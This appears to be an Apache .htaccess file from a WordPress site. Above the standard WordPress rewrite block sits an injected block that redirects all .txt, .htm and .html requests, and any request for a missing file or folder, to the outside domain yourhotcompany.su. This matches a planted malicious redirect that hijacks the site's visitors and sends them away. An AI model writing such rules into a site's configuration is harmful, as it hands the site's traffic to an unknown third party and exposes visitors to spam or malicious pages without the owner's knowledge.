<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^.+\.txt$ http://yourhotcompany.su/ [L]
RewriteRule ^.+\.htm$ http://yourhotcompany.su/ [L]
RewriteRule ^.+\.html$ http://yourhotcompany.su/ [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . http://yourhotcompany.su/ [L]
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
